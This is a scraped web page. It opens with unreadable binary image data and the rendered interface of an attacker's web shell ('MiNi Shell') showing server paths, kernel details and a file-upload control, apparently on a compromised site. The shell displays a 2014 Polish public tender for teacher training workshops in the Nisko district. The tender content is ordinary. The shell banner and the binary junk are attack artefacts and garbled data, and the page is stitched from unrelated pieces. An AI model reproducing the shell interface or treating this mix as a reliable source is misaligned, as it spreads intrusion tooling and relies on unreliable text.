JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140102/1662-N-2014.html

<p class="kh_header"><b>Nisko: Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów szkół i przedszkoli z terenu powiatu niżańskiego w ramach projektu Niżański program wspierania szkół, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet III Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół.</b><br>
<b>Numer ogłoszenia: 1662 - 2014; data zamieszczenia: 02.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poradnia Psychologiczno-Pedagogiczna , ul. Ignacego Paderewskiego 4, 37-400 Nisko, woj. podkarpackie, tel. 15 841 27 73, faks 15 841 27 73.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pppnisko.webd.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Poradnia Psychologiczno-Pedagogiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów szkół i przedszkoli z terenu powiatu niżańskiego w ramach projektu Niżański program wspierania szkół, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet III Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie zostało podzielone na 10 części i Zamawiający dopuszcza możliwość składania przez Wykonawcę ofert na 1 lub więcej części.


	Część 1. Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w PSP nr 1 w Nisku.
		Część 2. Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w PSP nr 4 w Nisku.
		Część 3. Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w Zespole Szkół nr 2 - PSP nr 5 w Nisku.
		Część 4. Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w PSP nr 1 w Rudniku nad Sanem.
		Część 5. Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w PSP w Wólce Tanewskiej.	
Część 6. Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w Gimnazjum nr 1 w Nisku.
		Część 7. Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w Zespole Szkół - Gimnazjum w Groblach.
	Część 8. Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w Zespole Szkół - Gimnazjum w Starym Narcie.
	Część 9. Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w LO w Nisku.
	Część 10. Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w LO w Rudniku nad Sanem.

Zamówienie dotyczy wspomagania placówek z terenu powiatu niżańskiego. Głównym celem projektu jest poprawa jakości funkcjonowania systemu doskonalenia nauczycieli poprzez wdrożenie kompleksowych planów wspomagania dla 22 placówek w latach szkolnych 2013/2014 i 2014/2015.

Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku nr 6 do SIWZ. 

Zajęcia będą odbywały się w okresie od 20.01.2014r. do 04.04.2014r. głównie w godzinach popołudniowych. Szczegółowy harmonogram zajęć zostanie przesłany Wykonawcy najpóźniej 7 dni kalendarzowych przed rozpoczęciem zajęć. 

Zamawiający zastrzega sobie zmianę terminu spotkań, o czym poinformuje Wykonawcę na co najmniej 7 dni przed planowanym terminem rozpoczęcia zajęć. 
W trakcie prowadzenia szkoleń/warsztatów nauczyciele będą przygotowywani również do prowadzenia zajęć w sposób niestereotypowy i równościowy, który umożliwia włączenie w równym stopniu dziewczynek i chłopców do każdego rodzaju zajęć (technologie informacyjno-komunikacyjne, przedmioty matematyczno-przyrodnicze, stereotypy płci w doradztwie zawodowym), tak aby byli świadomi wpływu stereotypów zarówno na sposób prowadzenia zajęć, jak i na dobór materiałów edukacyjnych. 
Całkowita liczba godzin doskonalenia (warsztaty, szkolenia) w roku szkolnym 2013/2014 dla każdej z części wynosi 15godz., które zostaną podzielone na 3 spotkania po 5 godz.  każde.
Godzinie zajęć odpowiada 45 minut.
Liczba uczestników/czek w każdej placówce będzie uzależniona od liczby nauczycieli pracujących w danej placówce oraz wyniesie do 30 osób.

Miejsce wykonywania usługi: szkoły z terenu powiatu niżańskiego zakwalifikowane do udziału w projekcie:

1. PSP nr 1 w Nisku - 37-400 Nisko, ul. Słowackiego 10
2. PSP nr 4 w Nisku - 37-400 Nisko, ul. Dąbrowskiego 8
3. Zespół Szkół nr 2 w Nisku - PSP nr 5 - 37-400 Nisko, ul. Tysiąclecia 12A
4. PSP nr 1 w Rudniku nad Sanem - 37-420 Rudnik nad Sanem, ul. Kończycka 3
5. PSP w Wólce Tanewskiej - 37-410 Wólka Tanewska, ul. Główna 61
6. Gimnazjum nr 1 w Nisku - 37-400 Nisko, ul. Chopina 31
7. Zespół Szkół w Groblach - Gimnazjum - 37-430 Groble 37
8. Zespół Szkół w Starym Narcie - Gimnazjum - 37-430 Stary Nart 57B
9. LO w Nisku - 37-400 Nisko, Ul. Plac Wolności 3
10. LO w Rudniku nad Sanem - 37-420 Rudnik nad Sanem, ul. Piłsudskiego 9


Do obowiązków Wykonawcy należy:
1.	przeprowadzenie szkoleń/warsztatów z należytą starannością,
2.	zapewnienie trenerów, szkoleniowców, wykładowców, ekspertów niezbędnych do  prawidłowego wykonania przedmiotu zamówienia. Zamawiający zastrzega, że w jednym dniu może odbywać się więcej niż 1 spotkanie (max. 5). 
3.	punktualne rozpoczynanie i kończenie zajęć (zgodnie z harmonogramem),
4.	terminowe wypełnienie dokumentów związanych z realizacją szkolenia przez Zamawiającego, w tym zapewnienie podpisywania list obecności przez osoby biorące udział	w spotkaniach, gromadzenie list obecności,
5.	niezwłoczne informowanie Zamawiającego o problemach związanych z realizacją szkolenia,
6.	opracowanie i przekazanie Zamawiającemu raportu końcowego z przeprowadzonego szkolenia,
7.	informowanie osób biorących udział w szkoleniu o współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
8.	przekazanie Zamawiającemu w terminie 3 dni od daty podpisania umowy CV osób odpowiedzialnych za prowadzenie szkolenia,
9.	opracowanie i przesłanie do zaakceptowania Koordynatorowi Projektu wersji elektronicznej scenariuszy zajęć wraz z załącznikami np. materiałami szkoleniowymi niezbędnymi do efektywnego przeprowadzenia szkolenia co najmniej 4 dni przed zajęciami. Zamawiający zastrzega możliwość odrzucenia proponowanego scenariusza, jeżeli nie będzie on zgodny z wytycznymi zawartymi w Załączniku nr 6. 
10.	wszystkie opracowane przez Wykonawcę materiały muszą być sporządzone w języku polskim i zawierać logotypy Unii Europejskiej i Zamawiającego oraz informację o współfinansowaniu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego na podstawie przesłanego przez Zamawiającego pocztą elektroniczną wzoru. Za prawidłowe użycie logotypów odpowiada Wykonawca.
11.	przekazanie każdemu z uczestników spotkania materiałów szkoleniowych np. wydruku z prezentacji multimedialnej.
12.	opracowanie i przesłanie do zaakceptowania SORE wersji elektronicznej ankiety ewaluacyjnej dotyczącej przeprowadzonych szkoleń co najmniej 3 dni przed spotkaniem;
13.	przeprowadzenie ankiety ewaluacyjnej dotyczącej przeprowadzonych  szkoleń 
z częstotliwością po każdym szkoleniu i przesłanie ich Zamawiającemu do dwóch tygodni po zakończeniu szkolenia,
14.	przygotowanie zaświadczeń/certyfikatów dla wszystkich uczestników szkoleń zgodnie ze wskazówkami Zamawiającego i wręczenie ich wszystkim uczestnikom w ostatnim dniu szkolenia po zakończeniu danego cyklu szkoleń oraz uzyskanie od nich potwierdzenia otrzymania ww. dokumentów,
15.	wydruk materiałów szkoleniowych, ankiet ewaluacyjnych, zaświadczeń,
16.	przestrzeganie przepisów o ochronie danych osobowych, zgodnie z ustawą z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101, poz. 926 z późn. zm.) podczas wykonywania przedmiotu umowy.
17.	zapewnienia niezbędnego do prawidłowej realizacji szkoleń sprzętu (m.in. projektor multimedialny, ekran, komputer itp.),
18.	uzgadniania wszelkich zmian harmonogramu, wynikających z zaistnienia ważnych powodów z właściwym dla danej placówki SORE oraz Koordynatorem Projektu. 
19.	każdorazowego ustalania formy szkolenia w porozumieniu z SORE, zgodnie z zapotrzebowaniem zgłaszanym przez placówki biorące udział w projekcie,
20.	wyznaczenia jednej osoby odpowiedzialnej za zarządzanie informacją, kontakt z SORE oraz Koordynatorem Projektu i organizację szkolenia (koordynatora organizacyjnego - opiekuna).
21.	zapewnienie instytucjom uprawnionym do przeprowadzenia kontroli prawo wglądu we wszystkie dokumenty związane z realizacją projektu systemowego, w tym dokumenty elektroniczne przez cały okres ich przechowywania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 04.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia	szczególnych wymagań w zakresie spełnienia tego warunku, Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (Załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że należycie przeprowadził w ciągu ostatnich trzech lat co najmniej 30 form doskonalenia (szkolenia, warsztaty) dla nauczycieli, potwierdzonych dowodami, że zostały wykonane należycie. (Załącznik nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia	szczególnych wymagań w zakresie spełnienia tego warunku, Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (Załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że na czas realizacji umowy będzie dysponował co najmniej 1 osobą, która spełnia następujące wymagania:
1.	Wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym z zakresu pedagogiki, psychologii lub stopień minimum doktora z zakresu pedagogiki lub psychologii,
2.	Stopień nauczyciela dyplomowanego,
3.	Posiadanie wiedzy merytorycznej i umiejętności prowadzenia szkoleń,
4.	Posiadanie doświadczenia w prowadzeniu zajęć z nauczycielami (realizacja min. 5 form doskonalenia np. szkoleń, warsztatów, konsultacji grupowych, indywidualnych, wykładów dla nauczycieli w ciągu ostatnich 3 lat),
5.	Posiadanie umiejętności w zakresie komunikacji interpersonalnej,
6.	Znajomość zasad funkcjonowania placówek oświatowych,
7.	Znajomość przepisów prawa oświatowego,
8.	Znajomość wymagań wobec szkół i placówek wynikających z Rozporządzenia Ministra Edukacji Narodowej z dnia 10 maja 2013r. zmieniającego rozporządzenie w sprawie nadzoru pedagogicznego. (Załącznik nr 5 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia	szczególnych wymagań w zakresie spełnienia tego warunku, Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (Załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy (Załącznik nr 1 do SIWZ). 
2. W przypadku gdy Wykonawcę reprezentuje pełnomocnik, do oferty winno być załączone pełnomocnictwo posiadające zakres uprawnień i podpisane przez osoby uprawnione do reprezentowania Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	zmniejszenie zakresu przedmiotu zamówienia, gdy jego wykonanie w pierwotnym zakresie nie leży w interesie Zamawiającego w granicach uzasadnionego interesu Zamawiającego,
2)	zmiany terminu realizacji przedmiotu zamówienia, w przypadku gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego w zakresie uzasadnionego interesu Zamawiającego,
3)	wystąpienia zdarzeń siły wyższej jako zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia,
4)	zaistnienia okoliczności (technicznych, gospodarczych itp.), których nie można było przewidzieć w chwili zawarcia umowy,
5)	konieczności zmiany osób przewidzianych do wykonania przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pppnisko.webd.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poradnia Psychologiczno-Pedagogiczna, ul. Paderewskiego 4, 37-400 Nisko - Biuro Projektu p.9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.01.2014 godzina 10:45, miejsce: Poradnia Psychologiczno-Pedagogiczna, ul. Paderewskiego 4, 37-400 Nisko - Sekretariat Poradni.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów szkół i przedszkoli z terenu powiatu niżańskiego w ramach projektu Niżański program wspierania szkół, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet III Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w PSP nr 1 w Nisku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy wspomagania placówek z terenu powiatu niżańskiego. Głównym celem projektu jest poprawa jakości funkcjonowania systemu doskonalenia nauczycieli poprzez wdrożenie kompleksowych planów wspomagania dla 22 placówek w latach szkolnych 2013/2014 i 2014/2015.

Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku nr 6 do SIWZ. 

Zajęcia będą odbywały się w okresie od 20.01.2014r. do 04.04.2014r. głównie w godzinach popołudniowych.
Całkowita liczba godzin doskonalenia (warsztaty, szkolenia) w roku szkolnym 2013/2014 wynosi 15godz., które zostaną podzielone na 3 spotkania po 5 godz.  każde.
Godzinie zajęć odpowiada 45 minut.
Liczba uczestników/czek w każdej placówce będzie uzależniona od liczby nauczycieli pracujących w danej placówce oraz wyniesie do 30 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 04.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w PSP nr 4 w Nisku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy wspomagania placówek z terenu powiatu niżańskiego. Głównym celem projektu jest poprawa jakości funkcjonowania systemu doskonalenia nauczycieli poprzez wdrożenie kompleksowych planów wspomagania dla 22 placówek w latach szkolnych 2013/2014 i 2014/2015.

Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku nr 6 do SIWZ. 

Zajęcia będą odbywały się w okresie od 20.01.2014r. do 04.04.2014r. głównie w godzinach popołudniowych.
Całkowita liczba godzin doskonalenia (warsztaty, szkolenia) w roku szkolnym 2013/2014 wynosi 15godz., które zostaną podzielone na 3 spotkania po 5 godz.  każde.
Godzinie zajęć odpowiada 45 minut.
Liczba uczestników/czek w każdej placówce będzie uzależniona od liczby nauczycieli pracujących w danej placówce oraz wyniesie do 30 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 04.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w Zespole Szkół nr 2 - PSP nr 5 w Nisku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy wspomagania placówek z terenu powiatu niżańskiego. Głównym celem projektu jest poprawa jakości funkcjonowania systemu doskonalenia nauczycieli poprzez wdrożenie kompleksowych planów wspomagania dla 22 placówek w latach szkolnych 2013/2014 i 2014/2015.

Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku nr 6 do SIWZ. 

Zajęcia będą odbywały się w okresie od 20.01.2014r. do 04.04.2014r. głównie w godzinach popołudniowych.
Całkowita liczba godzin doskonalenia (warsztaty, szkolenia) w roku szkolnym 2013/2014 wynosi 15godz., które zostaną podzielone na 3 spotkania po 5 godz.  każde.
Godzinie zajęć odpowiada 45 minut.
Liczba uczestników/czek w każdej placówce będzie uzależniona od liczby nauczycieli pracujących w danej placówce oraz wyniesie do 30 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 04.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Realizacja form doskonalenia (warsztaty, szkolenia) nauczycieli i dyrektorów w PSP nr 1 w Rudniku nad Sanem..</p>
